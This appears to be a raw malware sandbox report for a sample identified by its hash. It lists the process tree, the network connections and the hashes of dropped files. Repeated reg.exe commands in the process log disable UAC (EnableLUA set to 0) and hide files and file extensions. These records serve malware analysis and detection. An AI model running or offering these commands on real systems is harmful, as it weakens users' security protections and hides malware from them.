C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\JWAUQUMQ.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\qgokYMsw.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ckgUkUAo.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iSMAIoUQ.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\KGssggMU.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\XSEcooIw.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ngMcwYkY.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\LmIAQssU.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\eYwAYUoM.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\KUAowgcA.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cskMoUwc.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\eKIsQUsM.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\GsswQMMs.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\lWEUIEkM.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HwwEYYoM.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\ProgramData\waoYUQws\rgQoYAEU.exe
"C:\ProgramData\waoYUQws\rgQoYAEU.exe"
C:\Users\Admin\EiYAQYEc\hEIoIMIU.exe
"C:\Users\Admin\EiYAQYEc\hEIoIMIU.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 23.177.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | google.com | udp |
| GB | 172.217.169.78:80 | google.com | tcp |
| GB | 172.217.169.78:80 | google.com | tcp |
| US | 8.8.8.8:53 | 78.169.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 158.240.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 80.179.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.228.82.20.in-addr.arpa | udp |
| US | 204.79.197.200:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 200.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| IE | 51.104.136.2:443 | tcp | |
| IE | 51.104.136.2:443 | tcp | |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 20.114.59.183:443 | tcp | |
| US | 8.8.8.8:53 | 178.223.142.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 207.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.236.111.52.in-addr.arpa | udp |
| GB | 172.217.169.78:80 | google.com | tcp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| GB | 172.217.169.78:80 | google.com | tcp |
| US | 8.8.8.8:53 | 81.171.91.138.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.179.89.13.in-addr.arpa | udp |
Files
memory/1508-0-0x0000000000400000-0x000000000047A000-memory.dmp
memory/2984-17-0x0000000000400000-0x000000000046E000-memory.dmp
memory/1776-12-0x0000000000400000-0x000000000046E000-memory.dmp
memory/5040-31-0x0000000000400000-0x000000000047A000-memory.dmp
memory/2472-42-0x0000000000400000-0x000000000047A000-memory.dmp
memory/4452-55-0x0000000000400000-0x000000000047A000-memory.dmp
memory/1616-67-0x0000000000400000-0x000000000047A000-memory.dmp
memory/3228-92-0x0000000000400000-0x000000000047A000-memory.dmp
memory/4452-105-0x0000000000400000-0x000000000047A000-memory.dmp
memory/1696-116-0x0000000000400000-0x000000000047A000-memory.dmp
memory/1776-118-0x0000000000400000-0x000000000046E000-memory.dmp
memory/4860-143-0x0000000000400000-0x000000000047A000-memory.dmp
memory/3096-156-0x0000000000400000-0x000000000047A000-memory.dmp
memory/3244-169-0x0000000000400000-0x000000000047A000-memory.dmp
memory/5040-233-0x0000000000400000-0x000000000047A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\sMUA.exe
| MD5 | a1e1efe06ce1b17c9c05f50254aa4d5f |
| SHA1 | b9a1db0a611fc6f40c83a10410c5e8b6e65c36e7 |
| SHA256 | ebfd009694f91dce05b9b590bc3a79ea01c6718bcaf2f8e4a23b2699c2c039ff |
| SHA512 | 1e2d3a40e41e8a8b82cd1251c6885d23ac75893fb93f6d43088567b7cdfac4ae8e503d674dd104aa86f3605ddd168ce5552e2e63a3c62c5b543998ea005d6922 |
memory/2284-906-0x0000000000400000-0x000000000047A000-memory.dmp
memory/4452-928-0x0000000000400000-0x000000000047A000-memory.dmp
memory/4452-936-0x0000000000400000-0x000000000047A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\QwUk.exe
| MD5 | b0e6148e9d6eafc7e9781fdbb64ab7b8 |
| SHA1 | b356f7813411cf992d90760ac46ab5eafdaa2430 |
| SHA256 | 0ee91888327ed8e394c9cfcfffe67ebdb011421fe2143dd077c9441eeebb3b4f |
| SHA512 | f0ca8962106654ddb5756d3b97e3185fe42800876a3b350a5824f8e08358a28a833ac9646f6ce46cfc2c44ec92b589f27818416663610eb4b26e10e707623f1b |
C:\Users\Admin\AppData\Local\Temp\ugwO.exe
| MD5 | 2483cbe4055fc4248ccd9715fdf1b5fe |
| SHA1 | c692802da7ab05dbb6a8c3a4c95f9735d301568e |
| SHA256 | 26c27a97cfd57964a0b0334cf9912a822e39eaa5b5dabb0d8692f8adfa0ceb42 |
| SHA512 | a1fc49674e2452cc4ea5264b246288266e9390453dd1990da269bdc0110857931475e4afe48181b84dcfe7a606672b885f8702b1a439b1ddd77ed3aea2f0257d |
C:\Users\Admin\AppData\Local\Temp\oAow.exe
| MD5 | 97d92aae83e9fbfab4b49df18218ba79 |
| SHA1 | 0ecd83c01ffbb6fd14541fce8baa91428325a8c0 |
| SHA256 | 233c9a49c5db666894d290ed428e025bf700e3e010db1e1f72947780fbd6e14c |
| SHA512 | f21055eebcfb3f8305a6c1ea9b40353949bdc3fd6e7138730b99737b3f5bf22c5e80c41ec737028c5aff8d999b9572f4bff7301f51c218206a5991cd47d7a9bd |
C:\Users\Admin\AppData\Local\Temp\eswS.exe
| MD5 | eb2debbedf4594408be9eb907a619921 |
| SHA1 | 5965350674a165ca9f25b476ba931a5ed0140a0c |
| SHA256 | 8d257b14e00edcef03b1dd2b24b3c62d4d5431786f641b0111183c7e8bc8ccc3 |
| SHA512 | 9d5d51c6b374dc7147e7afd98066b24acae8f402c9d42168176f116602d449bafe811605db732b8abedab76e222ae014fac4b9ee800705a3b23cb2bd35c60f6c |
C:\Users\Admin\AppData\Local\Temp\kkQE.exe
| MD5 | 2b782a0a76110d1c2e5c947910afebb2 |
| SHA1 | fbbd8fdf2de66568a8b5688287d500734b3d16e1 |
| SHA256 | d9a2b9d50d404e301209898f9fa369bb1098d0be53581578635da28310376c46 |
| SHA512 | c19081826af35e3a6a80c7e39b410ae24c93e834f6ff8a2f409a47303133de44859564eb2c14d257354ad6e22d5ff972bba00f9b37a80087d20a7d631dbc6d13 |
C:\Users\Admin\AppData\Local\Temp\UAEk.exe
| MD5 | 7b396f4957ea94b0802e45ef324dafc6 |
| SHA1 | f1dcdad58905941e6e097375268f55e741fe85bb |
| SHA256 | 4f3ffefbcf41b1ce354cd0e1588176f04a24aa300deb68f00c7c73b49cd3b99a |
| SHA512 | 97fb4698c869814d5fb4cb7f510163150deb54ea4bf40dd928c5be0b1eb96ab4b99a96d4c67a04a22bf4e5d528523ac7b0f6542fde2174dc9a2a13f799d8ce42 |
C:\Users\Admin\AppData\Local\Temp\aEkC.exe
| MD5 | fc31653274322f1e03e386a5139722be |
| SHA1 | 103bf9f8805f98ed93c5eeaf4fb6887ec8bf2b21 |
| SHA256 | 83a3af8a7f354f7b50bffb0b6a95175749292ae4bd4d4d4401d67fa698d8accd |
| SHA512 | bffcfa0549cdc4b6da6cf89f7a8837890d29991b3f92a34f7c3ac9835a5f2a1db1c8f9e39d22440431a2aa6ec37c80a30f54c55b963493cd5bfebcbc1cde4b4f |
C:\Users\Admin\AppData\Local\Temp\WUgk.exe
| MD5 | 4439f5fa24b89be6b733ad989414cc49 |
| SHA1 | 72e4475de7647bc0829b96401eff32c33292b337 |
| SHA256 | 7548c1d52f5236587d8db7a80e4410c151162b51c974f017b676416996e65757 |
| SHA512 | 41b508dc39d42218aba185b607ab28bdd61cf53a1f8c9e6778d8f839364a2723dc3c41b200c30cf517fc592c0708fecde9f1b9ad178cc0f73cc2cd081125176c |
C:\Users\Admin\AppData\Local\Temp\eMgs.exe
| MD5 | 1146193e3343f0d005ad2c62daffe8ec |
| SHA1 | 77d16a939854cd0d9d726ff7cc67a466e56adf3b |
| SHA256 | 601c2966adfef1668fe43c9b5cc0638bdd0d989f837fb30eee4bd07ca26eeed2 |
| SHA512 | 6babfcb2bf8774e2d3189d65ce2b9f5140aa0a866e546ea258073fe7bb57d631977b54d31bf06fda5e6f4da41c3b80b84879bccf13740ea192d3fb0d6fb067e2 |
C:\Users\Admin\AppData\Local\Temp\UAsw.exe
| MD5 | 04af86dd79bbea4a325dcb31be56a0e9 |
| SHA1 | a340799c073b148751c26b6b1627eb92ec456b29 |
| SHA256 | 4ee265d1c7823cbf8f32d93613234d6bf75eb694a80619ca6c854b790dcbed0f |
| SHA512 | c972f83295af0792b0cb87a0b6b030bde0436c970b79a5f7161f3569ce46b11a2bed4ddf964f8bde1d9078331f55a6389591b11396bcf7eac0d828c7a8c5d852 |
C:\Users\Admin\AppData\Local\Temp\oosM.exe
| MD5 | 7b9eac56907ea13f01d2d7d9f2895fe0 |
| SHA1 | f2c4f9c3d9422ff3e43582fdd15511322e3a3bf9 |
| SHA256 | 2d16573516fa082ded0d359ef835d3e6858ff237bf157fb1af3b5b54a9d0024b |
| SHA512 | 68b607ed25e6fc08d0199ac24d3b4e443844037fe84a93e3e6e9aa8a2e8f0244b017aefcb61d6b08560bdc6df4d4ebe6aa56ce5ac4ffb021a1322e76969c90dc |
C:\Users\Admin\AppData\Local\Temp\sAYm.exe
| MD5 | 697f6c8980cf8c9d617a63ac43f8a8e7 |
| SHA1 | e7b5ddb5e2774171b5203877445c6f0c80e9d615 |
| SHA256 | eafbc43b45d8fe095bb2c19b0b640a2e229eb6515c8ed2e8dd9ad0109d01fc27 |
| SHA512 | 5f4bf7e50d83e64ebb7f41452196269c9ef5c7bf0e5f57083c1db8c4fc7fd1e0adfbbd15ec0e6eb82f831d1ab47e02b14a0c7bafab569453ba903825f5478352 |
C:\Users\Admin\AppData\Local\Temp\ikks.ico
| MD5 | f31b7f660ecbc5e170657187cedd7942 |
| SHA1 | 42f5efe966968c2b1f92fadd7c85863956014fb4 |
| SHA256 | 684e75b6fdb9a7203e03c630a66a3710ace32aa78581311ba38e3f26737feae6 |
| SHA512 | 62787378cea556d2f13cd567ae8407a596139943af4405e8def302d62f64e19edb258dce44429162ac78b7cfc2260915c93ff6b114b0f910d8d64bf61bdd0462 |
C:\Users\Admin\AppData\Local\Temp\goQi.exe
| MD5 | 2910a7a1d3613d068450628aafb598b0 |
| SHA1 | d97eadd1ca9865e6dc745108150ff469c4b5084a |
| SHA256 | d6049dcad025aa5953a16b8aff1770c4045334ffd1b0a7da389542707292ceb8 |
| SHA512 | 3e4fb26890089415b33c9483ffabdebdcae98f267d00bccab4cbb1c593faa2e79eb8d109c981efe6fbf08b91115baf003cd94e5d94ed5da5b378e2375053761b |
C:\Users\Admin\AppData\Local\Temp\AAcS.exe
| MD5 | 56de12c255876de3685003f8b2be602c |
| SHA1 | 2e9203e7452d58e79c3cd13c75e44cf7d035613d |
| SHA256 | d6ba0e3585f0425025b0b5958636a8dd82a95e8eb61ed7e8ea47ddc33a7d57ed |
| SHA512 | 01508eb0fa1753de575f83d8f9b9556a2ef7b662bb75878e3f0252fd970ab8be2f4620b8c0ca017f1d0fcffb796a50b77482ce73bc5f701cde7a99acb54b88bc |
C:\Users\Admin\AppData\Local\Temp\gAEu.exe
| MD5 | fb6c0d2b37e52225dbb9bf9d59c8776a |
| SHA1 | 6281cfa0bad4dcedcb7d867028fdf70cc2906049 |
| SHA256 | 6ac3f642be7e4629e1a3a394f1e1d1ff37b2ec2cbf1c740eea9255da863fcd2f |
